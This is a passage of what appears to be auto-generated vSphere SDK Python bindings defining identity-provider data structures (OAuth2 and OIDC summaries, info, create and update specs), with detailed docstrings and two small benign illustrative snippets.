Server, authenticate with the Authorization Server in accordance with
Section 3.2.1 of OAuth 2.0 [RFC6749] by including the Client Credentials in
the request body. This class attribute was added in vSphere API 7.0.0.
"""
CLIENT_SECRET_JWT = None
"""
Clients that have received a client_secret value from the Authorization
Server, create a JWT using an HMAC SHA algorithm, such as HMAC SHA-256. The
HMAC (Hash-based Message Authentication Code) is calculated using the
octets of the UTF-8 representation of the client_secret as the shared key.
This class attribute was added in vSphere API 7.0.0.
"""
PRIVATE_KEY_JWT = None
"""
Clients that have registered a public key sign a JWT using that key. The
client authenticates in accordance with JSON Web Token (JWT) Profile for
OAuth 2.0 Client Authentication and Authorization Grants [OAuth.JWT] and
Assertion Framework for OAuth 2.0 Client Authentication and Authorization
Grants [OAuth.Assertions]. This class attribute was added in vSphere API
7.0.0.
"""
def __init__(self, string):
"""
:type string: :class:`str`
:param string: String value for the :class:`Oauth2AuthenticationMethod` instance.
"""
Enum.__init__(string)
Oauth2AuthenticationMethod._set_values([
Oauth2AuthenticationMethod('CLIENT_SECRET_BASIC'),
Oauth2AuthenticationMethod('CLIENT_SECRET_POST'),
Oauth2AuthenticationMethod('CLIENT_SECRET_JWT'),
Oauth2AuthenticationMethod('PRIVATE_KEY_JWT'),
])
Oauth2AuthenticationMethod._set_binding_type(type.EnumType(
'com.vmware.vcenter.identity.providers.oauth2_authentication_method',
Oauth2AuthenticationMethod))
class Summary(VapiStruct):
"""
The ``Providers.Summary`` class contains commonly used information about an
identity provider. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
_validator_list = [
UnionValidator(
'config_tag',
{
'Oauth2' : [('oauth2', True)],
'Oidc' : [('oidc', True)],
}
),
]
def __init__(self,
provider=None,
name=None,
config_tag=None,
oauth2=None,
oidc=None,
is_default=None,
domain_names=None,
auth_query_params=None,
):
"""
:type provider: :class:`str`
:param provider: The identifier of the provider. This attribute was added in vSphere
API 7.0.0.
When clients pass a value of this class as a parameter, the
attribute must be an identifier for the resource type:
``com.vmware.vcenter.identity.Providers``. When methods return a
value of this class as a return value, the attribute will be an
identifier for the resource type:
``com.vmware.vcenter.identity.Providers``.
:type name: :class:`str`
:param name: The user friendly name for the provider. This attribute was added
in vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
:type config_tag: :class:`Providers.ConfigType`
:param config_tag: The config type of the identity provider. This attribute was added
in vSphere API 7.0.0.
:type oauth2: :class:`Providers.Oauth2Summary`
:param oauth2: OAuth2 Summary. This attribute was added in vSphere API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``configTag`` is :attr:`Providers.ConfigType.Oauth2`.
:type oidc: :class:`Providers.OidcSummary`
:param oidc: OIDC Summary. This attribute was added in vSphere API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``configTag`` is :attr:`Providers.ConfigType.Oidc`.
:type is_default: :class:`bool`
:param is_default: Specifies whether the provider is the default provider. This
attribute was added in vSphere API 7.0.0.
:type domain_names: :class:`set` of :class:`str`
:param domain_names: Set of fully qualified domain names to trust when federating with
this identity provider. Tokens from this identity provider will
only be validated if the user belongs to one of these domains, and
any domain-qualified groups in the tokens will be filtered to
include only those groups that belong to one of these domains. If
domainNames is an empty set, domain validation behavior at login
with this identity provider will be as follows: the user's domain
will be parsed from the User Principal Name (UPN) value that is
found in the tokens returned by the identity provider. This domain
will then be implicitly trusted and used to filter any groups that
are also provided in the tokens. This attribute was added in
vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
:type auth_query_params: :class:`dict` of :class:`str` and :class:`list` of :class:`str`
:param auth_query_params:
key/value pairs that are to be appended to the authEndpoint
request.
How to append to authEndpoint request: If the map is not empty, a
"?" is added to the endpoint URL, and combination of each k and
each string in the v is added with an "&" delimiter. Details:
* If the value contains only one string, then the key is added with
"k=v".
* If the value is an empty list, then the key is added without a
"=v".
* If the value contains multiple strings, then the key is repeated
in the query-string for each string in the value.
. This attribute was added in vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
"""
self.provider = provider
self.name = name
self.config_tag = config_tag
self.oauth2 = oauth2
self.oidc = oidc
self.is_default = is_default
self.domain_names = domain_names
self.auth_query_params = auth_query_params
VapiStruct.__init__(self)
Summary._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.summary', {
'provider': type.IdType(resource_types='com.vmware.vcenter.identity.Providers'),
'name': type.OptionalType(type.StringType()),
'config_tag': type.ReferenceType(__name__, 'Providers.ConfigType'),
'oauth2': type.OptionalType(type.ReferenceType(__name__, 'Providers.Oauth2Summary')),
'oidc': type.OptionalType(type.ReferenceType(__name__, 'Providers.OidcSummary')),
'is_default': type.BooleanType(),
'domain_names': type.OptionalType(type.SetType(type.StringType())),
'auth_query_params': type.OptionalType(type.MapType(type.StringType(), type.ListType(type.StringType()))),
},
Summary,
False,
None))
class Info(VapiStruct):
"""
The ``Providers.Info`` class contains the information about an identity
provider. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
_validator_list = [
UnionValidator(
'config_tag',
{
'Oauth2' : [('oauth2', True)],
'Oidc' : [('oidc', True)],
}
),
UnionValidator(
'idm_protocol',
{
'REST' : [('idm_endpoints', True)],
'SCIM' : [('idm_endpoints', True)],
'LDAP' : [('active_directory_over_ldap', True)],
}
),
]
def __init__(self,
name=None,
org_ids=None,
config_tag=None,
oauth2=None,
oidc=None,
is_default=None,
domain_names=None,
auth_query_params=None,
idm_protocol=None,
idm_endpoints=None,
active_directory_over_ldap=None,
upn_claim=None,
groups_claim=None,
):
"""
:type name: :class:`str`
:param name: The user friendly name for the provider. This attribute was added
in vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
:type org_ids: :class:`set` of :class:`str`
:param org_ids: The set of orgIds as part of SDDC creation which provides the basis
for tenancy. This attribute was added in vSphere API 7.0.0.
:type config_tag: :class:`Providers.ConfigType`
:param config_tag: The config type of the identity provider. This attribute was added
in vSphere API 7.0.0.
:type oauth2: :class:`Providers.Oauth2Info`
:param oauth2: OAuth2 Info. This attribute was added in vSphere API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``configTag`` is :attr:`Providers.ConfigType.Oauth2`.
:type oidc: :class:`Providers.OidcInfo`
:param oidc: OIDC Info. This attribute was added in vSphere API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``configTag`` is :attr:`Providers.ConfigType.Oidc`.
:type is_default: :class:`bool`
:param is_default: Specifies whether the provider is the default provider. This
attribute was added in vSphere API 7.0.0.
:type domain_names: :class:`set` of :class:`str`
:param domain_names: Set of fully qualified domain names to trust when federating with
this identity provider. Tokens from this identity provider will
only be validated if the user belongs to one of these domains, and
any domain-qualified groups in the tokens will be filtered to
include only those groups that belong to one of these domains. If
domainNames is an empty set, domain validation behavior at login
with this identity provider will be as follows: the user's domain
will be parsed from the User Principal Name (UPN) value that is
found in the tokens returned by the identity provider. This domain
will then be implicitly trusted and used to filter any groups that
are also provided in the tokens. This attribute was added in
vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
:type auth_query_params: :class:`dict` of :class:`str` and :class:`list` of :class:`str`
:param auth_query_params:
key/value pairs that are to be appended to the authEndpoint
request.
How to append to authEndpoint request: If the map is not empty, a
"?" is added to the endpoint URL, and combination of each k and
each string in the v is added with an "&" delimiter. Details:
* If the value contains only one string, then the key is added with
"k=v".
* If the value is an empty list, then the key is added without a
"=v".
* If the value contains multiple strings, then the key is repeated
in the query-string for each string in the value.
. This attribute was added in vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
:type idm_protocol: :class:`Providers.IdmProtocol` or ``None``
:param idm_protocol: Communication protocol to the identity management endpoints. This
attribute was added in vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
:type idm_endpoints: :class:`list` of :class:`str`
:param idm_endpoints: Identity management endpoints. This attribute was added in vSphere
API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``idmProtocol`` is one of :attr:`Providers.IdmProtocol.REST` or
:attr:`Providers.IdmProtocol.SCIM`.
:type active_directory_over_ldap: :class:`Providers.ActiveDirectoryOverLdap`
:param active_directory_over_ldap: Identity management configuration. This attribute was added in
vSphere API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``idmProtocol`` is :attr:`Providers.IdmProtocol.LDAP`.
:type upn_claim: :class:`str`
:param upn_claim: Specifies which claim provides the user principal name (UPN) for
the user. This attribute was added in vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
:type groups_claim: :class:`str`
:param groups_claim: Specifies which claim provides the group membership for the token
subject. If empty, the default behavior for CSP is used. In this
case, the groups for the subject will be comprised of the groups in
'group_names' and 'group_ids' claims. This attribute was added in
vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
"""
self.name = name
self.org_ids = org_ids
self.config_tag = config_tag
self.oauth2 = oauth2
self.oidc = oidc
self.is_default = is_default
self.domain_names = domain_names
self.auth_query_params = auth_query_params
self.idm_protocol = idm_protocol
self.idm_endpoints = idm_endpoints
self.active_directory_over_ldap = active_directory_over_ldap
self.upn_claim = upn_claim
self.groups_claim = groups_claim
VapiStruct.__init__(self)
Info._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.info', {
'name': type.OptionalType(type.StringType()),
'org_ids': type.SetType(type.StringType()),
'config_tag': type.ReferenceType(__name__, 'Providers.ConfigType'),
'oauth2': type.OptionalType(type.ReferenceType(__name__, 'Providers.Oauth2Info')),
'oidc': type.OptionalType(type.ReferenceType(__name__, 'Providers.OidcInfo')),
'is_default': type.BooleanType(),
'domain_names': type.OptionalType(type.SetType(type.StringType())),
'auth_query_params': type.OptionalType(type.MapType(type.StringType(), type.ListType(type.StringType()))),
'idm_protocol': type.OptionalType(type.ReferenceType(__name__, 'Providers.IdmProtocol')),
'idm_endpoints': type.OptionalType(type.ListType(type.URIType())),
'active_directory_over_ldap': type.OptionalType(type.ReferenceType(__name__, 'Providers.ActiveDirectoryOverLdap')),
'upn_claim': type.OptionalType(type.StringType()),
'groups_claim': type.OptionalType(type.StringType()),
},
Info,
False,
None))
class CreateSpec(VapiStruct):
"""
The ``Providers.CreateSpec`` class contains the information used to create
an identity provider. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
_validator_list = [
UnionValidator(
'config_tag',
{
'Oauth2' : [('oauth2', True)],
'Oidc' : [('oidc', True)],
}
),
UnionValidator(
'idm_protocol',
{
'REST' : [('idm_endpoints', True)],
'SCIM' : [('idm_endpoints', True)],
'LDAP' : [('active_directory_over_ldap', True)],
}
),
]
def __init__(self,
config_tag=None,
oauth2=None,
oidc=None,
org_ids=None,
is_default=None,
name=None,
domain_names=None,
auth_query_params=None,
idm_protocol=None,
idm_endpoints=None,
active_directory_over_ldap=None,
upn_claim=None,
groups_claim=None,
):
"""
:type config_tag: :class:`Providers.ConfigType`
:param config_tag: The config type of the identity provider. This attribute was added
in vSphere API 7.0.0.
:type oauth2: :class:`Providers.Oauth2CreateSpec`
:param oauth2: OAuth2 CreateSpec. This attribute was added in vSphere API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``configTag`` is :attr:`Providers.ConfigType.Oauth2`.
:type oidc: :class:`Providers.OidcCreateSpec`
:param oidc: OIDC CreateSpec. This attribute was added in vSphere API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``configTag`` is :attr:`Providers.ConfigType.Oidc`.
:type org_ids: :class:`set` of :class:`str` or ``None``
:param org_ids: The set of orgIds as part of SDDC creation which provides the basis
for tenancy. This attribute was added in vSphere API 7.0.0.
If None, the set will be empty.
:type is_default: :class:`bool` or ``None``
:param is_default: Specifies whether the provider is the default provider. Setting
``isDefault`` of current provider to True makes all other providers
non-default. If no other providers created in this vCenter Server
before, this parameter will be disregarded, and the provider will
always be set to the default. This attribute was added in vSphere
API 7.0.0.
If None the provider will be the default provider if it is the
first provider that is created, and will not be the default
provider otherwise.
:type name: :class:`str` or ``None``
:param name: The user friendly name for the provider. This name can be used for
human-readable identification purposes, but it does not have to be
unique, as the system will use internal UUIDs to differentiate
providers. This attribute was added in vSphere API 7.0.0.
If None, the name will be the empty string
:type domain_names: :class:`set` of :class:`str` or ``None``
:param domain_names: Set of fully qualified domain names to trust when federating with
this identity provider. Tokens from this identity provider will
only be validated if the user belongs to one of these domains, and
any domain-qualified groups in the tokens will be filtered to
include only those groups that belong to one of these domains. This
attribute was added in vSphere API 7.0.0.
If None, domainNames will be the empty set and the domain
validation behavior at login with this identity provider will be as
follows: the user's domain will be parsed from the User Principal
Name (UPN) value that is found in the tokens returned by the
identity provider. This domain will then be implicitly trusted and
used to filter any groups that are also provided in the tokens.
:type auth_query_params: (:class:`dict` of :class:`str` and :class:`list` of :class:`str`) or ``None``
:param auth_query_params:
key/value pairs that are to be appended to the authEndpoint
request.
How to append to authEndpoint request: If the map is not empty, a
"?" is added to the endpoint URL, and combination of each k and
each string in the v is added with an "&" delimiter. Details:
* If the value contains only one string, then the key is added with
"k=v".
* If the value is an empty list, then the key is added without a
"=v".
* If the value contains multiple strings, then the key is repeated
in the query-string for each string in the value.
. This attribute was added in vSphere API 7.0.0.
If None, the map will be empty.
:type idm_protocol: :class:`Providers.IdmProtocol` or ``None``
:param idm_protocol: Communication protocol to the identity management endpoints. This
attribute was added in vSphere API 7.0.0.
If None, no communication protocol will be configured for the
identity provider.
:type idm_endpoints: :class:`list` of :class:`str`
:param idm_endpoints: Identity management endpoints. When specified, at least one
endpoint must be provided. This attribute was added in vSphere API
7.0.0.
This attribute is optional and it is only relevant when the value
of ``idmProtocol`` is one of :attr:`Providers.IdmProtocol.REST` or
:attr:`Providers.IdmProtocol.SCIM`.
:type active_directory_over_ldap: :class:`Providers.ActiveDirectoryOverLdap`
:param active_directory_over_ldap: Identity management configuration. If the protocol is LDAP, the
configuration must be set, else InvalidArgument is thrown. This
attribute was added in vSphere API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``idmProtocol`` is :attr:`Providers.IdmProtocol.LDAP`.
:type upn_claim: :class:`str` or ``None``
:param upn_claim: Specifies which claim provides the user principal name (UPN) for
the user. This attribute was added in vSphere API 7.0.0.
If None, the claim named 'acct' will be used to provide backwards
compatibility with CSP.
:type groups_claim: :class:`str` or ``None``
:param groups_claim: Specifies which claim provides the group membership for the token
subject. These groups will be used for mapping to local groups per
the claim map. This attribute was added in vSphere API 7.0.0.
If None, the default behavior will be CSP backwards compatibility.
The groups for the subject will be composed of the groups in the
'group_names' and 'group_ids' claims.
"""
self.config_tag = config_tag
self.oauth2 = oauth2
self.oidc = oidc
self.org_ids = org_ids
self.is_default = is_default
self.name = name
self.domain_names = domain_names
self.auth_query_params = auth_query_params
self.idm_protocol = idm_protocol
self.idm_endpoints = idm_endpoints
self.active_directory_over_ldap = active_directory_over_ldap
self.upn_claim = upn_claim
self.groups_claim = groups_claim
VapiStruct.__init__(self)
CreateSpec._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.create_spec', {
'config_tag': type.ReferenceType(__name__, 'Providers.ConfigType'),
'oauth2': type.OptionalType(type.ReferenceType(__name__, 'Providers.Oauth2CreateSpec')),
'oidc': type.OptionalType(type.ReferenceType(__name__, 'Providers.OidcCreateSpec')),
'org_ids': type.OptionalType(type.SetType(type.StringType())),
'is_default': type.OptionalType(type.BooleanType()),
'name': type.OptionalType(type.StringType()),
'domain_names': type.OptionalType(type.SetType(type.StringType())),
'auth_query_params': type.OptionalType(type.MapType(type.StringType(), type.ListType(type.StringType()))),
'idm_protocol': type.OptionalType(type.ReferenceType(__name__, 'Providers.IdmProtocol')),
'idm_endpoints': type.OptionalType(type.ListType(type.URIType())),
'active_directory_over_ldap': type.OptionalType(type.ReferenceType(__name__, 'Providers.ActiveDirectoryOverLdap')),
'upn_claim': type.OptionalType(type.StringType()),
'groups_claim': type.OptionalType(type.StringType()),
},
CreateSpec,
False,
None))
class UpdateSpec(VapiStruct):
"""
The ``Providers.UpdateSpec`` class contains the information used to update
the identity provider. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
_validator_list = [
UnionValidator(
'config_tag',
{
'Oauth2' : [('oauth2', True)],
'Oidc' : [('oidc', True)],
}
),
UnionValidator(
'idm_protocol',
{
'REST' : [('idm_endpoints', True)],
'SCIM' : [('idm_endpoints', True)],
'LDAP' : [('active_directory_over_ldap', True)],
}
),
]
def __init__(self,
config_tag=None,
oauth2=None,
oidc=None,
org_ids=None,
make_default=None,
name=None,
domain_names=None,
auth_query_params=None,
idm_protocol=None,
idm_endpoints=None,
active_directory_over_ldap=None,
upn_claim=None,
reset_upn_claim=None,
groups_claim=None,
reset_groups_claim=None,
):
"""
:type config_tag: :class:`Providers.ConfigType`
:param config_tag: The config type of the identity provider. This attribute was added
in vSphere API 7.0.0.
:type oauth2: :class:`Providers.Oauth2UpdateSpec`
:param oauth2: OAuth2 UpdateSpec. This attribute was added in vSphere API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``configTag`` is :attr:`Providers.ConfigType.Oauth2`.
:type oidc: :class:`Providers.OidcUpdateSpec`
:param oidc: OIDC UpdateSpec. This attribute was added in vSphere API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``configTag`` is :attr:`Providers.ConfigType.Oidc`.
:type org_ids: :class:`set` of :class:`str` or ``None``
:param org_ids: The set orgIds as part of SDDC creation which provides the basis
for tenancy. This attribute was added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type make_default: :class:`bool` or ``None``
:param make_default: Specifies whether to make this the default provider. If
``makeDefault`` is set to true, this provider will be flagged as
the default provider and any other providers that had previously
been flagged as the default will be made non-default. If
``makeDefault`` is set to false, this provider's default flag will
not be modified. This attribute was added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type name: :class:`str` or ``None``
:param name: The user-friendly name for the provider. This name can be used for
human-readable identification purposes, but it does not have to be
unique, as the system will use internal UUIDs to differentiate
providers. This attribute was added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type domain_names: :class:`set` of :class:`str` or ``None``
:param domain_names: Set of fully qualified domain names to trust when federating with
this identity provider. Tokens from this identity provider will
only be validated if the user belongs to one of these domains, and
any domain-qualified groups in the tokens will be filtered to
include only those groups that belong to one of these domains. This
attribute was added in vSphere API 7.0.0.
If None, leaves value unchanged. If domainNames is an empty set,
domain validation behavior at login with this identity provider
will be as follows: the user's domain will be parsed from the User
Principal Name (UPN) value that is found in the tokens returned by
the identity provider. This domain will then be implicitly trusted
and used to filter any groups that are also provided in the tokens.
:type auth_query_params: (:class:`dict` of :class:`str` and :class:`list` of :class:`str`) or ``None``
:param auth_query_params: key/value pairs that are to be appended to the authEndpoint
request. How to append to authEndpoint request: if the map is not
empty, a "?" is added to the endpoint URL, and each combination of
a key and a string in its value is appended with an "&" delimiter.
Details:
* If the value contains only one string, the key is added as
"k=v".
* If the value is an empty list, the key is added without a
"=v".
* If the value contains multiple strings, the key is repeated in
the query string for each string in the value.
If the map is empty, all params are deleted. This attribute was
added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type idm_protocol: :class:`Providers.IdmProtocol` or ``None``
:param idm_protocol: The protocol used to communicate with the identity management
endpoints. This attribute was added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type idm_endpoints: :class:`list` of :class:`str`
:param idm_endpoints: Identity management endpoints. When specified, at least one
endpoint must be provided. This attribute was added in vSphere API
7.0.0.
This attribute is optional and it is only relevant when the value
of ``idmProtocol`` is one of :attr:`Providers.IdmProtocol.REST` or
:attr:`Providers.IdmProtocol.SCIM`.
:type active_directory_over_ldap: :class:`Providers.ActiveDirectoryOverLdap`
:param active_directory_over_ldap: Identity management configuration. If the protocol is LDAP, the
configuration must be set, else InvalidArgument is thrown. This
attribute was added in vSphere API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``idmProtocol`` is :attr:`Providers.IdmProtocol.LDAP`.
:type upn_claim: :class:`str` or ``None``
:param upn_claim: Specifies which claim provides the user principal name (UPN) for
the subject of the token. This attribute was added in vSphere API
7.0.0.
If None, leaves value unchanged.
:type reset_upn_claim: :class:`bool` or ``None``
:param reset_upn_claim: Flag indicating whether the user principal name (UPN) claim should
be set back to its default value. If this field is set to ``true``,
the user principal name (UPN) claim will be set to 'acct', which is
used for backwards compatibility with CSP. If this field is set to
``false``, the existing user principal name (UPN) claim will be
changed to the value specified in
:attr:`Providers.UpdateSpec.upn_claim`, if any. This attribute was
added in vSphere API 7.0.0.
If None, the existing user principal name (UPN) claim will be
changed to the value specified in
:attr:`Providers.UpdateSpec.upn_claim`, if any.
:type groups_claim: :class:`str` or ``None``
:param groups_claim: Specifies which claim provides the group membership for the token
subject. This attribute was added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type reset_groups_claim: :class:`bool` or ``None``
:param reset_groups_claim: Flag indicating whether any existing groups claim value should be
removed. If this field is set to ``true``, the existing groups
claim value is removed, which restores backwards compatibility
with CSP. In this case, the groups for the subject will be
composed of the groups in the 'group_names' and 'group_ids' claims. If
this field is set to ``false``, the existing groups claim will be
changed to the value specified in
:attr:`Providers.UpdateSpec.groups_claim`, if any. This attribute
was added in vSphere API 7.0.0.
If None, the existing groups claim will be changed to the value
specified in :attr:`Providers.UpdateSpec.groups_claim`, if any.
"""
self.config_tag = config_tag
self.oauth2 = oauth2
self.oidc = oidc
self.org_ids = org_ids
self.make_default = make_default
self.name = name
self.domain_names = domain_names
self.auth_query_params = auth_query_params
self.idm_protocol = idm_protocol
self.idm_endpoints = idm_endpoints
self.active_directory_over_ldap = active_directory_over_ldap
self.upn_claim = upn_claim
self.reset_upn_claim = reset_upn_claim
self.groups_claim = groups_claim
self.reset_groups_claim = reset_groups_claim
VapiStruct.__init__(self)
UpdateSpec._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.update_spec', {
'config_tag': type.ReferenceType(__name__, 'Providers.ConfigType'),
'oauth2': type.OptionalType(type.ReferenceType(__name__, 'Providers.Oauth2UpdateSpec')),
'oidc': type.OptionalType(type.ReferenceType(__name__, 'Providers.OidcUpdateSpec')),
'org_ids': type.OptionalType(type.SetType(type.StringType())),
'make_default': type.OptionalType(type.BooleanType()),
'name': type.OptionalType(type.StringType()),
'domain_names': type.OptionalType(type.SetType(type.StringType())),
'auth_query_params': type.OptionalType(type.MapType(type.StringType(), type.ListType(type.StringType()))),
'idm_protocol': type.OptionalType(type.ReferenceType(__name__, 'Providers.IdmProtocol')),
'idm_endpoints': type.OptionalType(type.ListType(type.URIType())),
'active_directory_over_ldap': type.OptionalType(type.ReferenceType(__name__, 'Providers.ActiveDirectoryOverLdap')),
'upn_claim': type.OptionalType(type.StringType()),
'reset_upn_claim': type.OptionalType(type.BooleanType()),
'groups_claim': type.OptionalType(type.StringType()),
'reset_groups_claim': type.OptionalType(type.BooleanType()),
},
UpdateSpec,
False,
None))
class Oauth2Summary(VapiStruct):
"""
The ``Providers.Oauth2Summary`` class contains commonly used information
about an OAuth2 identity provider. This class was added in vSphere API
7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
auth_endpoint=None,
token_endpoint=None,
client_id=None,
authentication_header=None,
auth_query_params=None,
):
"""
:type auth_endpoint: :class:`str`
:param auth_endpoint: Authentication/authorization endpoint of the provider. This
attribute was added in vSphere API 7.0.0.
:type token_endpoint: :class:`str`
:param token_endpoint: Token endpoint of the provider. This attribute was added in vSphere
API 7.0.0.
:type client_id: :class:`str`
:param client_id: Client identifier to connect to the provider. This attribute was
added in vSphere API 7.0.0.
:type authentication_header: :class:`str`
:param authentication_header: The authentication data used as part of the request header to
acquire or refresh an OAuth2 token. The data format depends on the
authentication method used. Example of basic authentication format:
Authorization: Basic [base64Encode(clientId + ":" + secret)]. This
attribute was added in vSphere API 7.0.0.
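The basic authentication format described above could be produced like this (an illustrative sketch; ``make_basic_header`` is a hypothetical name, not an SDK function):

```python
import base64

def make_basic_header(client_id, secret):
    # Hypothetical helper producing the documented basic format:
    # Basic base64Encode(clientId + ":" + secret)
    raw = ('%s:%s' % (client_id, secret)).encode('utf-8')
    return 'Basic ' + base64.b64encode(raw).decode('ascii')

make_basic_header('my-client', 's3cret')
```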
:type auth_query_params: :class:`dict` of :class:`str` and :class:`list` of :class:`str`
:param auth_query_params:
key/value pairs that are to be appended to the authEndpoint
request.
How to append to authEndpoint request: if the map is not empty, a
"?" is added to the endpoint URL, and each combination of a key and
a string in its value is appended with an "&" delimiter. Details:
* If the value contains only one string, the key is added as
"k=v".
* If the value is an empty list, the key is added without a
"=v".
* If the value contains multiple strings, the key is repeated in
the query string for each string in the value.
This attribute was added in vSphere API 7.0.0.
"""
self.auth_endpoint = auth_endpoint
self.token_endpoint = token_endpoint
self.client_id = client_id
self.authentication_header = authentication_header
self.auth_query_params = auth_query_params
VapiStruct.__init__(self)
Oauth2Summary._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.oauth2_summary', {
'auth_endpoint': type.URIType(),
'token_endpoint': type.URIType(),
'client_id': type.StringType(),
'authentication_header': type.StringType(),
'auth_query_params': type.MapType(type.StringType(), type.ListType(type.StringType())),
},
Oauth2Summary,
False,
None))
class Oauth2Info(VapiStruct):
"""
The ``Providers.Oauth2Info`` class contains the information about an OAuth2
identity provider. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
auth_endpoint=None,
token_endpoint=None,
public_key_uri=None,
client_id=None,
client_secret=None,
claim_map=None,
issuer=None,
authentication_method=None,
auth_query_params=None,
):
"""
:type auth_endpoint: :class:`str`
:param auth_endpoint: Authentication/authorization endpoint of the provider. This
attribute was added in vSphere API 7.0.0.
:type token_endpoint: :class:`str`
:param token_endpoint: Token endpoint of the provider. This attribute was added in vSphere
API 7.0.0.
:type public_key_uri: :class:`str`
:param public_key_uri: Endpoint to retrieve the provider public key for validation. This
attribute was added in vSphere API 7.0.0.
:type client_id: :class:`str`
:param client_id: Client identifier to connect to the provider. This attribute was
added in vSphere API 7.0.0.
:type client_secret: :class:`str`
:param client_secret: The secret shared between the client and the provider. This
attribute was added in vSphere API 7.0.0.
:type claim_map: :class:`dict` of :class:`str` and (:class:`dict` of :class:`str` and :class:`list` of :class:`str`)
:param claim_map: The map used to transform an OAuth2 claim to a corresponding claim
that vCenter Server understands. Currently only the key "perms" is
supported. The key "perms" is used for mapping the "perms" claim of
the incoming JWT. The value is another map with an external group as
the key and a vCenter Server group as the value. This attribute was
added in vSphere API 7.0.0.
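For illustration, a claim map with the documented shape might look like the following (the group names are hypothetical):

```python
# Hypothetical claim_map matching the documented shape: the outer key
# "perms" maps external groups (keys) to lists of vCenter Server
# groups (values).
claim_map = {
    'perms': {
        'external-idp-admins': ['vsphere-administrators'],
        'external-idp-users': ['vsphere-users', 'vsphere-readers'],
    },
}
```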
:type issuer: :class:`str`
:param issuer: The identity provider namespace. It is used to validate the issuer
in the acquired OAuth2 token. This attribute was added in vSphere
API 7.0.0.
:type authentication_method: :class:`Providers.Oauth2AuthenticationMethod`
:param authentication_method: Authentication method used by the provider. This attribute was
added in vSphere API 7.0.0.
:type auth_query_params: :class:`dict` of :class:`str` and :class:`list` of :class:`str`
:param auth_query_params:
key/value pairs that are to be appended to the authEndpoint
request.
How to append to authEndpoint request: if the map is not empty, a
"?" is added to the endpoint URL, and each combination of a key and
a string in its value is appended with an "&" delimiter. Details:
* If the value contains only one string, the key is added as
"k=v".
* If the value is an empty list, the key is added without a
"=v".
* If the value contains multiple strings, the key is repeated in
the query string for each string in the value.
This attribute was added in vSphere API 7.0.0.
"""
self.auth_endpoint = auth_endpoint
self.token_endpoint = token_endpoint
self.public_key_uri = public_key_uri
self.client_id = client_id
self.client_secret = client_secret
self.claim_map = claim_map
self.issuer = issuer
self.authentication_method = authentication_method
self.auth_query_params = auth_query_params
VapiStruct.__init__(self)
Oauth2Info._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.oauth2_info', {
'auth_endpoint': type.URIType(),
'token_endpoint': type.URIType(),
'public_key_uri': type.URIType(),
'client_id': type.StringType(),
'client_secret': type.StringType(),
'claim_map': type.MapType(type.StringType(), type.MapType(type.StringType(), type.ListType(type.StringType()))),
'issuer': type.StringType(),
'authentication_method': type.ReferenceType(__name__, 'Providers.Oauth2AuthenticationMethod'),
'auth_query_params': type.MapType(type.StringType(), type.ListType(type.StringType())),
},
Oauth2Info,
False,
None))
class Oauth2CreateSpec(VapiStruct):
"""
The ``Providers.Oauth2CreateSpec`` class contains the information used to
create an OAuth2 identity provider. This class was added in vSphere API
7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
auth_endpoint=None,
token_endpoint=None,
public_key_uri=None,
client_id=None,
client_secret=None,
claim_map=None,
issuer=None,
authentication_method=None,
auth_query_params=None,
):
"""
:type auth_endpoint: :class:`str`
:param auth_endpoint: Authentication/authorization endpoint of the provider. This
attribute was added in vSphere API 7.0.0.
:type token_endpoint: :class:`str`
:param token_endpoint: Token endpoint of the provider. This attribute was added in vSphere
API 7.0.0.
:type public_key_uri: :class:`str`
:param public_key_uri: Endpoint to retrieve the provider public key for validation. This
attribute was added in vSphere API 7.0.0.
:type client_id: :class:`str`
:param client_id: Client identifier to connect to the provider. This attribute was
added in vSphere API 7.0.0.
:type client_secret: :class:`str`
:param client_secret: The secret shared between the client and the provider. This
attribute was added in vSphere API 7.0.0.
:type claim_map: :class:`dict` of :class:`str` and (:class:`dict` of :class:`str` and :class:`list` of :class:`str`)
:param claim_map: The map used to transform an OAuth2 claim to a corresponding claim
that vCenter Server understands. Currently only the key "perms" is
supported. The key "perms" is used for mapping the "perms" claim of
the incoming JWT. The value is another map with an external group as
